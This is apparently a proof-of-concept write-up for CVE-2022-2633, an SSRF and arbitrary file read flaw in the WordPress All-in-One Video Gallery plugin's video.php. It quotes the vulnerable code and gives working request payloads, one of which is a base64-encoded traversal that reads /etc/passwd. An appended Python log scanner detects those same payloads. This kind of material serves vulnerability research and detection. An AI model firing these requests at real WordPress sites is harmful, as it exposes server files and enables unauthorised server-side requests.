Awesome-POC/服务器应用漏洞/WordPress All-in-One Video Gallery video.php 任意文件读取漏洞 CVE-2022-2633.md
2022-12-05 11:09:28 +08:00


# WordPress All-in-One Video Gallery video.php Arbitrary File Read Vulnerability CVE-2022-2633
## Vulnerability Description
The video.php file of the WordPress All-in-One Video Gallery plugin contains an SSRF and an arbitrary file read vulnerability. An attacker who sends a specially crafted request can read arbitrary files from the server.
## Affected Versions
```
WordPress All-in-One Video Gallery <= 2.6.0
```
## Plugin Name
```
All-in-One Video Gallery
```
https://downloads.wordpress.org/plugin/all-in-one-video-gallery.2.6.0.zip
## Reproduction
Diffing the patched release against the vulnerable one locates the affected file: wp-content/plugins/all-in-one-video-gallery/public/video.php
![image-20221017170543356](./images/202210171705476.png)
The code reads the dl parameter. When dl is not numeric, its value is base64-decoded and used directly as the file path:
```
// Vulnerable branch: a non-numeric dl value is base64-decoded and used as-is
if ( is_numeric( $_GET['dl'] ) ) {
    $file = get_post_meta( (int) $_GET['dl'], 'mp4', true );
} else {
    $file = base64_decode( $_GET['dl'] );
}
if ( empty( $file ) ) {
    die( esc_html__( 'Download file URL is empty.', 'all-in-one-video-gallery' ) );
    exit;
}
```
![image-20221017170604454](./images/202210171706536.png)
When the decoded value does not contain http:// or https://, the value of $formatted_path is changed.
![image-20221017170622056](./images/202210171706133.png)
When $formatted_path is a URL, SSRF is possible: passing the base64-encoded target URL returns that URL's response in the page.
```
/index.php/video/?dl=aHR0cHM6Ly93d3cuYmFpZHUuY29t
```
![image-20221017170640788](./images/202210171706868.png)
The final code fragment is where the arbitrary file read occurs:
![image-20221017170655893](./images/202210171706975.png)
```
/index.php/video/?dl=Li4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
```
![image-20221017170708523](./images/202210171707604.png)
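As an added defensive example (not part of the original write-up), the following Python script scans web-server access logs for the two request shapes shown above: it base64-decodes any non-numeric dl value sent to the video endpoint and labels it as the URL (SSRF) branch or the local-path (file read) branch. The log lines are constructed, and the leading-slash check is an added heuristic.

```python
import base64
import binascii
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (not real traffic); the two non-numeric dl
# values are the payload shapes in the write-up: a base64 URL and a base64 traversal path.
SAMPLE_LOG = """\
10.0.0.5 - - [17/Oct/2022:17:06:40 +0000] "GET /index.php/video/?dl=aHR0cHM6Ly93d3cuYmFpZHUuY29t HTTP/1.1" 200 512
10.0.0.5 - - [17/Oct/2022:17:07:08 +0000] "GET /index.php/video/?dl=Li4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA%3D%3D HTTP/1.1" 200 1843
10.0.0.9 - - [17/Oct/2022:17:07:30 +0000] "GET /index.php/video/?dl=42 HTTP/1.1" 200 9000
10.0.0.9 - - [17/Oct/2022:17:07:31 +0000] "GET /wp-login.php HTTP/1.1" 200 3000
"""
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/', re.MULTILINE)

def decode_dl(value):
    """Mirror the plugin's branch: numeric dl is a post ID, else base64-decode; "" if nothing to review."""
    if value.isdigit():
        return ""
    padded = value + "=" * (-len(value) % 4)   # tolerate stripped padding
    try:
        return base64.b64decode(padded, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return ""

def classify(decoded):
    """Label a decoded dl value by the code path the write-up describes, or None."""
    if decoded.lower().startswith(("http://", "https://")):
        return "ssrf"        # URL branch: fetched server-side and echoed back
    if "../" in decoded or "..\\" in decoded or decoded.startswith("/"):
        return "file_read"   # local-path branch; the leading "/" check is an added heuristic
    return None

def scan_log(text):
    """Return (client, label, decoded_dl) for each suspicious video.php request."""
    findings = []
    for m in REQUEST_RE.finditer(text):
        client, url = m.group(1), urlsplit(m.group(2))
        if "/video/" not in url.path:
            continue
        for dl in parse_qs(url.query).get("dl", []):   # parse_qs undoes %3D -> =
            decoded = decode_dl(dl)
            label = classify(decoded)
            if label:
                findings.append((client, label, decoded))
    return findings

if __name__ == "__main__":
    for client, label, target in scan_log(SAMPLE_LOG):
        print(f"{client}\t{label}\t{target}")
```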